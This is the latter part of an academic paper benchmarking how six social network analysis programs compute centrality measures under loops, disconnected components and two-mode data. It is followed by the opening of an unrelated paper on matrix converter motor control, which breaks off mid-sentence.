demonstrated high consistency in the measures produced (“High” in Table 4) are not discussed but may be noted in the table below. For all measures, with the exception of eigenvec- tor, differences in output were generally more pronounced in smaller networks. Data Nodes in Main Component Nodes in Smaller Components Number of Loops Max. Number of Nodes Average Degree Small One-mode 29 6 6 35 3.5 Large One-mode 1876 112 60 2000 3.0 Small Two-mode (10, 21) 4 NA (10, 25) 3.7 Large Two-mode (300, 1815) 185 NA (300, 1700) 3.7 Connections Benchmarking and Reliability Issues 28 | Volume 37 | Issues 1&2 | insna.org Table 4: Consistency of output by centrality type and network conditions High = Completely consistent, Medium = One or two programs vary from the others, Low = More than two programs offer unique results Closeness Centrality Closeness centrality measures showed the least amount of measurement variability in ideal networks (i.e., no loops or discon- nected components), or in networks con- taining loops, but not in disconnected components. In networks containing no loops or disconnected components, plots indicated that calculations of closeness centrality were consistent between Pajek, sna, igraph, ORA, and UCINET; but only when UCINET was calculated using Freeman (1979) normalization. UCINET and Gephi also correspond when closeness measures in UCINET are report- ed as summed or averaged distances. In this condition, both UCINET and Gephi produce output for Freeman closeness with smaller values indicating shorter average distances from a particular node to all oth- ers in the graph (see negative correlation coefficients [small graph r = -0.9903, large graph r = 0.9883]). UCINET also offers an “Average Reciprocal Distance” measure (ARD) that corresponds more closely with other programs (small graph r =0.9850, large graph r =0.9990). No Disconnected Components & No Loops Disconnected Components Loops Disconnected Components & Loops 1 Mode 2 Mode 1 Mode 2 Mode 1 Mode 2 Mode 1 Mode 2 Mode Between- ness Cen- trality High High High High High NA High NA Degree Centrality High Medi- um High Medi- um Low NA Low NA Eigenvec- tor Cen- trality Medium Medi- um Medi- um Low Medium NA Low NA Closeness Centrality Medium Medi- um Low Low Medium NA Low NA Benchmarking and Reliability Issues Connections insna.org | Issues 1&2 | Volume 37 | 29 Figure 1: Scatterplot matrix comparing closeness centrality output for a large, two-mode network. Pearson’s correlation coefficients between programs are provided above the diagonal. In two-mode networks, neither UCINET, nor Gephi produced results that corresponded with other programs (Figure 1). UCINET, the only one of these pro- grams to include a closeness measure de- signed explicitly for use with two-mode data, produced a bifurcated plot in both large and small two-mode networks, though the effect is more pronounced in the larger networks (pictured, Figure 3). While the numeric values are different than those seen in degree centrality, the split- line pattern was similar to that observed in two-mode data without loops, but with dis- connected components included, and is at- tributable to UCINET’s distinctive treat- ment of two-mode output. Networks that contain disconnected components, but no loops, resulted in the greatest disparities in closeness centrality measurements. Although all software test- ed cited Freeman as the reference for their centrality measure, only sna seemed to closely implement Freeman’s (1979) ap- proach, and therefore produced no centrali- ty values when disconnected components were included in the graph, as expected under Freeman’s approach. All other tested software generated closeness centrality values, as did sna when disconnected com- ponents were not present. Although UCI- NET (as of version 6.452) no longer pro- vides a warning to the user that analyzing a disconnected graph with Freeman’s close- Connections Benchmarking and Reliability Issues 30 | Volume 37 | Issues 1&2 | insna.org ness centrality measure is technically inap- propriate, it does require the user to select between options for handling the unde- fined distances offered by disconnected components. Of the software that produced output under these conditions, values were disparate and only igraph and ORA were consistent with one another. (Figure 2) In considering networks with both loops and disconnected components, there was a similar disparity of closeness cen- trality measures as seen in graphs with no loops, but with disconnected components. The same pairs of consistent and incon- sistent software values as seen in the graphs with disconnected components were observed with loops added to the data. Figure 2: Scatterplot matrix comparing output for closeness centrality in a small, one-mode network. Pearson’s correlation coefficients between programs are provided above the diagonal. Note that the sna package for R does not produce measures between disconnected components, resulting in correla- tion values listed as “NA”. Benchmarking and Reliability Issues Connections insna.org | Issues 1&2 | Volume 37 | 31 Degree Centrality In networks with no loops, degree centrali- ty was consistent across software in one- mode networks, with the exception of UCINET. A similar pattern was observed for two-mode networks. For these two- mode data, UCINET values fell into two distinct groups in the plots contrasting UCINET with other software. The data are positively correlated, but some stratifica- tion is present. This pattern was similar for both large and small two-mode networks, though the effect is more pronounced in the larger networks (Figure 3). UCINET normalizes output for nodes in each mode individually, an aspect that differentiates it from other tested programs when handling two-mode data. Such differences between UCINET and other programs are eliminat- ed if the network is converted to bipartite, to be analyzed as a one-mode network. The measurement of degree centrality was con- sistent among all programs in networks that contained disconnected components with no loops. Figure 3: A variety of solutions are possible when analyzing two-mode networks in UCINET. Top Row: Scatterplots of UCINET’s degree (r = 0.3713) and closeness (r = -0.0134) output using the two- mode centrality procedure, compared with other analytic packages. All other packages performed identically. Bottom Row: When transformed into a bipartite network format, UCINET calculates as for a one-mode network, and results are analogous to other packages. Closeness centrality for the bipartite aspect was calculated using Freeman normalization in UCINET. Connections Benchmarking and Reliability Issues 32 | Volume 37 | Issues 1&2 | insna.org One-mode networks containing loops generated the greatest variability in measures of degree centrality across soft- ware (Figure 4). For both small and large networks with loops, calculations of degree that are made without modification of the data structure were consistent only be- tween UCINET and ORA, between igraph and Pajek, and between sna and Gephi (see Figure 4 for an example in a small net- work). In networks with both loops and disconnected components, the patterns were essentially the same as those ob- served for one-mode networks with loops only. No other new patterns were apparent. The variations in output stem from how each program handles loops. Program defaults counted single loops as two edges (Pajek and igraph), loops as one edge (UCINET and ORA), or ignored loops en- tirely under the default commands (Gephi and sna). Note that the two R packages (sna and igraph) differ in their default treatment of loops, with igraph defaulting to include loops and sna defaulting to ig- nore them in calculations. When the sna package was modified to include loops (di- ag = TRUE) in the calculation of degree centrality, sna counted all loops as one edge and the output was consistent with that of UCINET and ORA. Gephi counted all loops as two arcs in a manner that was consistent with Pajek and igraph. Figure 4: Scatterplot matrix comparing degree centrality output for a small, one-mode network con- taining loops. Pearson’s correlation coefficients between programs are provided above the diagonal. Benchmarking and Reliability Issues Connections insna.org | Issues 1&2 | Volume 37 | 33 Eigenvector Centrality Eigenvector centrality was inconsistent across software packages and network types. In networks with no loops or dis- connected components, eigenvector cen- trality measures were inconsistent between Gephi and other programs in moderately large, but not small one-mode networks. Changing the default number of iterations in Gephi’s eigenvector centrality measure from 100 to 1,000,000 greatly improved the consistency of measures between pro- grams; however, a small disparity remains for one-mode networks (r = 0.9901). In two-mode networks, igraph, ORA, Gephi, and Pajek’s “2-mode im- portant vertices” function produced results that were largely consistent with UCI- NET’s two-mode eigenvector centrality (Figure 5). Pajek’s “hubs and authorities” measure (designed for one-mode networks) and sna produced results that are consistent with one another (not shown). In large two-mode networks, however, the output from Gephi was again characterized by some small disparities (Figure 5). Figure 5: Scatterplot matrix comparing eigenvector centrality output for a large, two-mode network. Pearson’s correlation coefficients between programs are provided above the diagonal. Pajek output for this plot was calculated using “important vertices”, a two-mode generalization of hubs and authorities. Connections Benchmarking and Reliability Issues 34 | Volume 37 | Issues 1&2 | insna.org Networks containing loops, but lacking disconnected components resulted in additional variability in measures of ei- genvector centrality across software. As observed for degree centrality, the correla- tion between programs’ centrality values was high; however, a separate set of points forming a group off of the diagonal ap- peared. Eigenvector centralities calculated in large, one-mode networks resulted in correspondence between UCINET, ORA, igraph, and the “hubs and authorities” measure in Pajek. The result was similar in small one-mode networks. A correspond- ence between sna (which defaults to ignor- ing loops) and Gephi is also noted (Figure 6). The sna “evcent” function offers two additional options for calculating eigenvec- tor centrality. The sna evcent function with included loops (diag=TRUE argument) yielded eigenvector scores correlated (r = 1.0) with all other software except for Gephi results. However, when combining presence of loops with the more robust calculation of eigenvector centrality (di- ag=TRUE, use.eigen=TRUE) specified in the user manual, the outputted eigenvector is inversely correlated (sna : other packag- es, r = -1.0; sna : Gephi, r = -0.89). The variability in eigenvector centrality scores was noted in large and small networks, but more pronounced in the former. Figure 6: Scatterplot matrix of eigenvector centrality output for a small, one-mode network with loops. Pearson’s correlation coefficients between programs are provided above the diagonal. Note, initial cal- culations in sna – shown above – were run using the default argument (diag=FALSE). For additional variation, consult the text above. Benchmarking and Reliability Issues Connections insna.org | Issues 1&2 | Volume 37 | 35 The igraph package produced eigenvector output that differed slightly from other programs in networks that contain discon- nected components, but no loops (small networks r = 0.9890). The disparity was much less pronounced in large networks (r = 0.9997). The above patterns of inconsisten- cies in calculating eigenvector centrality persisted in networks with both loops and disconnected components. In small net- works of this type, Pajek, UCINET, and ORA produced measures that were con- sistent with one another. Similarly, sna and Gephi also produced nearly identical out- put in small networks with both loops and disconnected components. In larger net- works, however, the similarities between sna and Gephi diminished. Only Pajek, UCINET, and ORA were highly consistent (see Figure 7). Figure 7: Scatterplot matrix comparing eigenvector centrality output for a moderately large, one-mode network containing loops and disconnected components. Pearson’s correlation coefficients between programs are provided above the diagonal. Betweenness Centrality Measurement of betweenness centrality was virtually unaffected by the various network conditions being evaluated (i.e., loops, disconnected components). Measures were consistent for each of the tested packages, on every dataset (see Fig- ure 8 for an example). The one, very slight, exception was in UCINET’s two- mode measures. UCINET differed slightly from other programs in measuring be- tweenness in the small two-mode network Connections Benchmarking and Reliability Issues 36 | Volume 37 | Issues 1&2 | insna.org (r = 0.9996, accompanied by slight jitter in scatterplots – not shown). However, no dif- ferences were apparent if the same network was converted to bipartite and the one- mode variation of the betweenness meas- ure was used instead. For more examples of the differences between UCINET’s two- mode measures and other programs’ ap- proaches to two-mode networks, see Fig- ure 3. Figure 8: Scatterplot matrix comparing betweenness centrality output for a large, one-mode network. Pearson’s correlation coefficients between programs are provided above the diagonal. Benchmarking and Reliability Issues Connections insna.org | Issues 1&2 | Volume 37 | 37 Discussion This study was designed to examine basic reliability concerns among a selection of popular tools in use within the social net- work analysis community. Specifically, we investigated whether some popular soft- ware packages were producing equivalent results. We found variability that brings to light disagreement, sometimes substantial, over how four concepts of node centrality should be measured. The programs under consideration were only able to produce the same output under a very narrow set of conditions. Disagreements over aspects of how these measures should be operational- ized manifested as networks departed from the ideal reference graphs that contained no loops or disconnected components. Such variability precludes the ability to seamlessly port data and/or exchange measures between programs and makes it essential for the user to have access to evaluations that highlight differences be- tween the default, and available, options for various measures when using two or more programs in concert. Within the so- cial network analysis community, the dif- fering assumptions behind the various measurement variations unnecessarily cloud communication between users of dif- ferent programs and leave enough doubt in the minds of new entrants as to whether the community has unified its language. Be- low, we discuss in greater detail our inter- pretation of the results, the implications of our findings for the average user, and the implications for the social network analy- sis community. General findings By employing hierarchical subsets of net- work conditions, we isolated measure dif- ferences under specific conditions. The use of varying network conditions was intend- ed to better reflect a range of network data that are likely to be encountered. Condi- tions in the undirected networks ranged from the “ideal” of reference data – no loops or disconnected components – to scenarios commonly encountered when analyzing social networks, namely, loops, disconnected components, and the combi- nation of the two. In general, centrality measures for reference graphs – those with no loops or disconnected components – were largely consistent. This may be taken to imply that programs are implementing the same – or very similar – algorithms for the offered measures, albeit mainly in the absence of issues that may complicate calculation, such as loops and disconnected compo- nents. A notable inconsistency did, how- ever, arise in the analysis of the two-mode reference networks. Of the tested software, only UCINET offered measures tailored specifically for two-mode networks. Cor- respondingly, analytic results reveal a bi- furcated pattern when comparing calcula- tions of degree and closeness in UCINET to those of other software packages, along with slight differences in betweenness measures in small two-mode networks. No other programs demonstrated a pattern that corresponded to that of UCINET when measuring degree, closeness, or between- ness. When measuring eigenvector central- ity, however, three additional programs (igraph, ORA, and Gephi) evince a bifur- cated pattern that corresponds very closely with UCINET. (Figure 9) Connections Benchmarking and Reliability Issues 38 | Volume 37 | Issues 1&2 | insna.org Figure 9: Scatterplot matrices comparing degree and eigenvector output for a two-mode network. Nei- ther network contains loops or disconnected components. Pearson’s correlation coefficients between programs are provided above the diagonal. There was a surprising amount of inconsistency in the most basic measure: degree centrality. Programs’ definitions identified degree centrality as either the number of neighbors adjacent to a node, or the number of edges incident upon a node. However, many programs did not provide a citation for this measure. Among those that do, the Freeman (1979) definition is employed, which does not account for a topological feature that is common in bio- logical, corporate, citation, and other net- works: self-referencing, or loops. Freeman implements a variation on Nieminen (1974), which accounts for the number or proportion of other nodes that are adjacent to a particular node, but not for nodes that are adjacent to themselves (i.e., loops). The evaluated programs defaulted to three dif- ferent methods for dealing with loops in a graph, revealing the variation in degree centrality calculations. This disparity be- tween definitions of what constitutes a loop and how its effect should be measured in such a conceptually simple calculation suggests the need for the community of social network analysts to strengthen naming and meas- urement standards. Such a process may re- duce error in interpretations resulting from what are actually different measures resid- ing under the same name. The problem of different measures residing under the same name is exempli- fied when considering eigenvector central- ity. Although most programs identify this measure as eigenvector centrality, the presence of loops in a network reveals slight differences in how this measure is operationalized. In its essence, eigenvector centrality extends degree centrality by weighting each node’s score by its neigh- bors’ scores (Bonacich 1972). Like degree, it is affected by loops. Five of the tested programs cite Bonacich (1972, or 1987) in calculations of this measure, and one – Pa- jek – employs the analogous “hubs and au- thorities” (Kleinberg 1999). As with de- gree centrality, the presence of loops in a network reveals which programs opera- tionalized this measure using the same or substantially similar assumptions. Benchmarking and Reliability Issues Connections insna.org | Issues 1&2 | Volume 37 | 39 Three programs – UCINET, ORA, and Pa- jek – were consistent with one another in measuring eigenvector centrality in all three variations of one-mode networks. This is notable because one of those three, Pajek, provides “hubs and authorities”, which generates two independently scaled measurement vectors, of which the authori- ties vector was consistent with eigenvector centrality in the other two programs. This is the one case where a centrality meas- urement that differed from the classic cita- tion was identified under a different name. Perhaps the most conspicuous case of inconsistent calculations is closeness centrality in the presence of disconnected components. All programs evaluated refer- enced Freeman’s (1979) measure, with the exception of Pajek, which cites Sabidussi (1966), as cited in Freeman. However, it quickly becomes apparent that the question of how to operationalize closeness centrali- ty is neither agreed upon, nor settled in consideration of disconnected components. The original formula for closeness centrali- ty should not function with disconnected data since the distance between discon- nected components is undefined (Freeman 1979). Any means of dealing with discon- nected data, with the possible exception of running calculations only within each indi- vidual component, is therefore a later vari- ation of the Freeman formulation. Isolates and other disconnected components – which can be common network features in some areas – frequently present an obstacle to communicating the results of this meas- ure. A wide array of alternate measures has since been proposed to allow calculation of closeness with disconnected data (e.g., Borgatti 2006, Dangalchev 2006, Opsahl 2010, Wei et al 2011). Amid such prolifer- ation, however, it is unclear which forms have been incorporated in the software yielding results for disconnected compo- nent datasets. Only the R package sna produced an error message without numerical results rather than closeness values as stipulated in Freeman (1979), because it treats the dis- tances between disconnected components as infinite. There is also a stern admonish- ment in the package details against calcu- lating closeness centrality in networks with disconnected components. All other soft- ware produced closeness calculations without requiring that smaller components first be removed. The analysis of disconnected net- works using closeness produced widely varied output. Correspondingly, all tested software provided some means for dealing with disconnected components. In most software, the method for defining the dis- tance between disconnected components was incorporated into the measure. ORA and the R package igraph appear to default to substituting the number of nodes for un- defined distances, whereas Gephi appears to report undefined distances as zero and omit disconnected nodes from calculation. Pajek sets undefined distances to zero and calculates closeness only within each com- ponent. Of the software tested, UCINET of- fers the most options for applying close- ness centrality to one-mode networks with disconnected components. The user may choose one of four options for dealing with the distances between disconnected com- ponents: (1) substitute the number of nodes in the graph for the undefined distance; (2) substitute the maximum distance, plus one (the default setting); (3) treat undefined distances as missing and assign no value to isolates; and (4) set undefined distances to zero and calculate closeness only within each component. Those four options, com- bined with three options for scaling output (summed distances, averaged distances, and Freeman normalization) present the user with 10 combinations of options14 for calculating closeness in cases with discon- nected components. Aside from differences in how out- put was scaled, there was essentially no variation in calculating betweenness cen- trality. This is perhaps unsurprising, as there is little room for interpretation in the definition of this measure. Betweenness, a 14 The option of treating undefined distances as missing is scaled in only one manner. Connections Benchmarking and Reliability Issues 40 | Volume 37 | Issues 1&2 | insna.org normalized count of the number of times that a node appears on the shortest path be- tween any two other nodes (Freeman 1977), will generally be unaffected by dis- connected components and loops since loops will not create new geodesics (short- est paths) and the absence of paths be- tween disconnected components does not complicate geodesic counts. It bears repeating that the programs tested displayed relatively little variation when analyzing reference graphs – those with neither loops, nor disconnected com- ponents. The variation that was present in the centrality output from the reference graphs appears more likely to have arisen from differences in opinion on preferred methods of calculation in situations that vary from the ideal of connected one-mode graphs with non-recursive edges. Implications for the field user The reference graphs make it clear that – with only a few exceptions – those respon- sible for developing and maintaining each of these programs have done an admirable job of benchmarking their programs against others and correcting unintentional software differences. However, network topology that diverges away from the “ide- al” reference graph reveals that there is a great deal of disparity in the analytic as- sumptions that are built into software used to calculate such measures. The problem that arises from this lack of understanding and agreement within the social network analysis community is that it puts both analysts and the field itself at a disad- vantage by introducing unnecessary noise into analyses and communication within the community. Certainly, for those analysts whose data are similar to our reference graphs (i.e., no loops, no isolates or other discon- nected components) the low variability in measurement definition and implementa- tion is good news. The lack of variation in the output for the four reference graphs in- dicates that the programs used in this study agree in their standards for the calculation of basic centrality measures under the most basic and favorable conditions. The differ- ences that resulted from other conditions, however, underscore the importance of an analyst’s familiarity with their choice of software, and the software used by those whose work they wish to use as an analytic benchmark. A good deal of care should be exercised to verify the precise method of calculation being applied and the settings – and defaults – that were employed for those calculations. Centrality measures typically form the foundation of an analysis and if their implementation varies, more complex al- gorithms that involve one or more of these centrality measures may be producing measures or results that magnify this vari- ability. Unfortunately, the variation in the measurement of centrality values between programs remains somewhat opaque. Measurement disparities were observed even when the terms and citations used to identify the measures were identical be- tween programs. Clearly, analyzing the same net- work in the same way, using different software, can produce divergent results. If the implementation of a given centrality measure differs from one program to an- other, they are at best two different variants of the same measure. If such is the case, it will aid the analyst to know which variant they are utilizing. With its variety of measures and selections, UCINET goes the furthest of all the software tested above in identifying which variant of a particular measure it is employing – naming particu- lar variants of the same measure according to its originator or an intuitive description of its function. Only a few of the tested an- alytic tools were consistently explicit about the equations used to produce all four measures. The clarity in communication that has characterized the development of methods in the field of social network analysis is less evident in software opera- tionalization. This presents a threat to the validity of how those measures are em- ployed. Definitional differences between programs exist and are not readily apparent Benchmarking and Reliability Issues Connections insna.org | Issues 1&2 | Volume 37 | 41 to the average user. Although variations in centrality calculations hold the potential to increase the validity of a particular meas- ure when applied in the appropriate con- text, such differences are frequently masked from the general user, resulting in increased potential for the misapplication of measures. The present research has highlight- ed the value of knowing what one is get- ting into when considering new analytic software, and the importance of thoroughly vetting the topology of the network being analyzed. Add to that the tendency for most software packages to have some pro- vision for porting data and/or measures be- tween packages. The detected disparity in measures available in the current analytic packages indicates that such practices should be undertaken with caution – espe- cially in cases where graphs contain loops, isolates, or disconnected components. If the basic measures differ between packag- es then it may be inadvisable to use the two packages together in an analysis that involves those measures. Implications for the social network analy- sis community The lack of consensus over how to opera- tionalize the most common node centrality measures suggests some ontological varia- bility within the social network analysis community. Disagreements over how vari- ous centrality measures should be opera- tionalized would not be troubling if they were apparent to the user. But the differ- ences highlighted above are far from clear to the average user. Lack of agreement over how to operationalize a measure is masked when a variety of approaches share a single name. The situation is exacerbated when software documentation does not clarify precisely which approach has been implemented. The debate over how various net- work measures should be calculated is rich, and as old as the field itself. The community’s openness to new variations on established methods provides flexibility and a healthy diversity of analytic options. However, the advantages of such wealth are substantially diminished when the same measure is operationalized different- ly in each analytic package. Although a shared lexicon of terms and concepts exists within the social network analysis commu- nity, those terms and concepts are only generally – and not explicitly – applied. The programs used to perform social net- work analysis are disparate enough to cre- ate idiosyncratic analytic results. The interfaces of each analytic package vary greatly and do not always de- fault to the most commonly used variants of each measure. Without equivalence of measurement assumptions and nomencla- ture between programs that is easily acces- sible, the assumption of equivalence and portability of centrality measures in net- work analysis is lacking. This increased variability of centrality results may poten- tially affect more complex algorithms that incorporate these basic measures. These basic differences could be resolved with agreed-upon defaults and naming conven- tions for variants of a particular measure or algorithm. It is important that the variants of each measure be identified as distinct vari- ations of a centrality – or other measure- ment – theme. It is not enough to identify a measure generally as “closeness centrality” if it varies from the basic measure identi- fied by Freeman (or Sabidussi) – which most all do. Instead, the measure should be explicitly identified as a particular variant in order to better emphasize its unique at- tributes and trade-offs. Explicit descriptions of measurements can be essential to proper analysis. To draw an example from another analytic field: post-hoc tests for pairwise compari- sons of means following analysis of vari- ance have been developed to address varia- tions in hypothesis testing, trade-offs be- tween power and error, unequal sample sizes, and unequal variances (for a discus- sion of 22 post-hoc tests see Kirk 1995). Although the more casual user may find such a selection daunting, the strength in Connections Benchmarking and Reliability Issues 42 | Volume 37 | Issues 1&2 | insna.org this diversity of options is that the user may better consider and tailor their analyt- ic selections. Additionally – and perhaps more importantly – small differences be- tween variations on a measure become a feature, rather than an obstacle, when a particular form of a measurement is explic- itly named. Naming conventions are important. If a measure or algorithm differs from oth- ers in order to address some given scenario or feature of network topology, then it bears unique attributes that more often than not constitute a trade-off at some level. It is far better for both the analyst and the community for these differences to become less opaque. Of the tested programs, UCI- NET appears to have gone the furthest in giving attribution to the different variants of each measure. Though, both R packages benefit from the explicit nature of specify- ing a measurement. This aids the analyst by further clarifying differences between analytic approaches. The community is aided in establishing reliability of meas- urements between programs; as such clari- ty makes it much easier to directly com- pare results from different programs. It is not necessary for each program to offer every available option – though several have clearly taken steps in that di- rection. It is likely to be much more help- ful to the social network analysis commu- nity at large if the measures and algorithms that a program offers are fully identified for appropriate application of their proper- ties. Proper identification will simplify dis- course and improve the communication of methods. Such improvements in communi- cation within the field also translate into increases in measurement validity when a measure is identified as a specific variant, rather than just belonging to a general cat- egory or class of measures. Lastly, it should be noted that a lack of agreement from within the commu- nity on something as fundamental as nam- ing conventions hints at an arbitrariness that is surprising given the care and rigor of those who have established and expand- ed the field of social network analysis. Freeman (1984, 2004) has repeatedly made a compelling case for clarity and precision in communication – as facilitated by math- ematical notation – being the factor that set social network analysis apart from similar fields that rely more on natural language for clarification. The benefits of such pre- cision are, however, often frustratingly be- yond the reach of those using social net- work analysis software. Further, as researchers from other fields continue to adapt and adopt social network analytic methods, the use of standard, specific terms on the available analytic options provides a clarity that aids newcomers to social network analysis in seeing how their field can benefit by adopting a network analytic approach. But the converse is not the case: imprecise def- initions need not constitute an invitation for some within the “hard sciences” to forego established network analysis meth- ods in favor of feigning to invent them for themselves. Although co-option will likely continue, there has been an increase in the number of new entrants to social network analysis who give proper attribution (Freeman 2011). Clarity of communication will reinforce social network analysis as a mature and growing field, and de- emphasize the perception of it as being a general perspective or a mere category of tools (Knoke and Yang 2008, Snowden 2005). In most cases, it is possible to force the centrality output for a network contain- ing loops or disconnected components to be relatively consistent across all six plat- forms employed above. But such actions frequently require transformations or other preprocessing in order to do so, and those steps are seldom stipulated since there is no real agreed-upon definition of exactly which mathematical approach constitutes each type of centrality. The clarity that comes with definitional consistency be- tween programs is what we feel to be needed. We advocate the clarity that comes with dissimilar means to a particular end being clearly identified up front. Benchmarking and Reliability Issues Connections insna.org | Issues 1&2 | Volume 37 | 43 The “correct” measure is the one that is best suited to handle the idiosyncra- sies of the data an analyst holds. For the analyst to make this assessment, they first need to know the topology of the network they are analyzing; and next, specifically how a measure is meant to operate, and its underlying assumptions. A more complete approach includes asking which variation of the measure is available, the strengths and limitations of that version, and how re- liably one or more programs produce accu- rate measures. We have identified program and inter-program reliability issues under varied conditions. Similar comparisons be- tween other programs and under different conditions are strongly recommended when weighing whether to use two or more analytic programs in conjunction with one another. Further evaluations of inter- program reliability will benefit from add- ing more types of variation: e.g., directed graphs, density variations, clusterability variations. Ongoing research in this topic will continue to be important as new en- trants continue to discover the scalability and utility of the tools and concepts of so- cial network analysis for deciphering in- creasingly diverse networks with complex topological features. References Anderson, E., Bai, Z., Bischof, C., Blackford, S., Demmel, J., Dongarra, J., Du Croz, J., Greenbaum, A., Hammarling, S., McKenney, A., Sorensen, D. (1999). LAPACK Users' Guide. (3rd ed.). Phila- delphia, PA: SIAM. Batagelj, V., Mrvar, A. (2003). Pajek – Analysis and Visualization of Large Networks. University of Ljubljana, Slovenia, EU. Available at: http://pajek.imfm.si/doku.php?id=download Bastian, M., Heymann S., Jacomy, M. (2009). Gephi: an open source software for exploring and manipu- lating networks. International AAAI Conference on Weblogs and Social Media. Available at: https://gephi.org. Becker, R.A., Chambers, J.M., Wilks, A.R., (1988). The New S Language. Pacific Grove, CA: Brooks/Cole. Bonacich, P. (1972). Factoring and weighting ap- proaches to status scores and clique identification. Journal of Mathematical Sociology, 2, 113–120. Bonacich, P. (1987). Power and centrality: A family of measures. American Journal of Sociology, 92, 1170–1182. Borgatti, S.P., Everett, M.G., Freeman, L.C. (2002). Ucinet for Windows: Software for Social Network Analysis. Analytic Technologies, Harvard, MA. Available at: http://www.analytictech.com/ucinet.htm Borgatti, S.P. (2006). Identifying sets of key players in a network. Computational, Mathematical and Or- ganizational Theory, 121, 21–34. Butts, C.T. (2007). sna: Tools for Social Network Analysis. Version 2.2. Irvine, CA. Available at: http://erzuli.ss.uci.edu/R.stuff Carley, K., Reminga, J. (2004). ORA: Organization Risk Analyzer*. Center for Analysis of Social and Organizational Systems, Carnegie Mellon Univer- sity. Pittsburgh, PA. Available at: http://www.casos.cs.cmu.edu/projects/ora Csardi, G., Nepusz, T. (2006). The igraph software package for complex network research. InterJour- nal, Cambridge, MA, 1695. Available at: http://igraph.sourceforge.net. Doreian, P. (2001). Causality in social network analy- sis. Sociological Methods Research, 30(1), 81– 114. Dangalchev C. (2006). Residual Closeness in Net- works. Physica, 365:2, 556–564. Freeman, L.C. (1977). A set of measures of centrality based on betweenness. Sociometry, 40: 35–41. Freeman L.C. (1979). Centrality in Social Networks: Conceptual clarification. Social Networks, 1: 215– 239. Freeman, L.C. (1984). Turning a profit from mathe- matics: the case of social networks. Journal of Mathematical Sociology, 10: 343–360. Freeman, L.C. (2004). The Development of Social Network Analysis: A Study in the Sociology of Sci- ence. North Charleston, SC: BookSurge. Freeman, L.C. (2011). The Development of Social Network Analysis: with an Emphasis on Recent Events, in Sage Handbook of Social Network Analysis. John Scott and Peter Carrington, eds. Thousand Oaks, CA: Sage, 26–39. Kirk, R.E. (1995). Experimental Design: Procedures for the Behavioral Sciences. (3rd ed.) Pacific Grove, CA: Brooks/Cole. Kleinberg, J. 1999. "Authoritative Sources in a Hyper- linked Environment." Journal of the ACM 46(5):604-32. Knoke, D., Yang, S. (2008). Social Network Analysis. (2nd ed.) Los Angeles, CA: Sage. Nieminen, J. (1974). On centrality in a graph. Social Science Research, 2: 371–378. Opsahl, T. (2010, March 20). Closeness centrality in networks with disconnected components. In: Tore Opsahl. Retrieved November 21, 2011, from http://toreopsahl.com/2010/03/20/closeness- centrality-in-networks-with-disconnected- components/ Connections Benchmarking and Reliability Issues 44 | Volume 37 | Issues 1&2 | insna.org Otte, E, Rousseau, R. (2002). Social network analysis: a powerful strategy, also for the information sci- ences. Journal of Information Science, 28, 441– 453. Reminga, J., Carley, K. (2003). Measures for ORA (Organization Risk Analyzer*). CASOS Working Papers. Retrieved November 21, 2011, from http://www.casos.cs.cmu.edu/publications/papers/r eminga_2003_ora.pdf Sabidussi, G. (1966). The centrality index of a graph. Psychometrika, 31, 581–603. Smith, B.T., Boyle, J.M., Dongarra, J.J., Garbow, B.S., Ikebe,Y., Klema, V., Moler, C.B. (1976). Matrix Eigensystems Routines – EISPACK Guide. Springer-Verlag Lecture Notes in Computer Sci- ence, 6. Snowden, D. (2005). From atomism to networks in social systems. The Learning Organization, 12(6), 552–562. Stokman, F.N., Doreian, P. (1997). Evolution of social networks: Processes and principles, Patrick Doreian and Frans N. Stokman, eds. Evolution of Social Networks. Amsterdam: Gordon and Breach Publishers, 233–250. Valente, T.W., Coronges, K., Lakon, C., Costenbader, E. (2008). How correlated are network centrality measures? Connections, 28(1), 16–26. Wei, W., Pfeffer, J., Reminga, J., Carley, K. (2011). Handling Weighted, Asymmetric, Self-Looped and Disconnected Networks. CASOS Technical Report: CMU-ISR-11-113. Retrieved November 21, 2011, from http://www.casos.cs.cmu.edu/publications/papers/ CMU-ISR-11-113.pdf Wikipedia (2011). Eigenvector Centrality. In: Central- ity. Retrieved November 21, 2011, from http://en.wikipedia.org/wiki/Betweenness#Eigenve ctor_centrality. Wilkinson, J.H. (1965). The Algebraic Eigenvalue Problem. New York, NY: Oxford University Press. work_gwruarfbz5a3lcgd3lqomenupi ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-008 54 Research on Control Strategy of Matrix Converter Motor System Xu Shuping School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China E-mail: 563937848@qq.com Chang Yichen School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China Su Xiaohui School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China Guo Yu School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China Abstract—In order to solve the problem of the industrial application of Matrix Converter (MC), the Matrix Converter Motor System (MCMS) is proposed. The control strategies of MCMS are studied based on the control of MC and the motor. The effects of voltage vector and direct torque control are analyzed. The simulation result show the disadvantages of usual means can be conquered by new means and it can obtain more high accuracy and robustness. The dynamic and static performances of direct torque control based on it are better than that of conventional direct toque control. The new ameliorated control strategy is proposed. Keywords-Matrix Converter; VVVF Control; Vector Control; Direct Torque Control I. INTRODUCTION Matrix converter output frequency is independent of input frequency limits, no DC link, small size, compact structure, good quality of input / output current, input power factor adjustable, and can be achieved two-way flow of energy. It is in line with the ideal standard of electric drive and expected to become the mainstream technology of future Electric transmission[1-3]. The biggest obstacle of hinder matrix converter access to industrial application is low voltage transfer. In the line shape modulation, the maximum of voltage transfer ratio of matrix converter is 0.866[4-5]. Therefore, scholars have proposed various solutions. Matrix converter motor system is a combination of both matrix converter and motor, so control strategy is also a combination of matrix converter and motor control method. This paper proposed the concept of matrix converter motor system aimed at the problems of matrix converter enter into industrial applications, and researched the control strategy of matrix converter motor system combined with matrix converter control method and the motor speed method. II. MATRIX CONVERTER MOTOR SYSTEM Matrix converter motor system is composed of matrix converter, matrix converter motor, input filter, clamp circuit and other components shown in Figure 1. In which, the rated magnetic flux of Matrix converter motor design based on the maximum voltage transfer ratio of 0.866 of matrix converter to meet the requirements of matrix converter voltage transfer ratio and take into account the integration issues with the matrix converter. In order to filter the high harmonic in input current caused by the switch frequency, matrix converter motor system needs to set the input filter. View from the power side of the matrix converter is a current source, so a LC second order filter circuit adopted, the design criteria of LC input filter as follows: cutoff frequency of input filter should be lower than the switch frequency; the power factor angle offset caused by the filter should be minimum under the minimum output power set; A certain voltage and electric resistance, minimize size or weight of the input filter by selecting capacitors with different power density; At rated 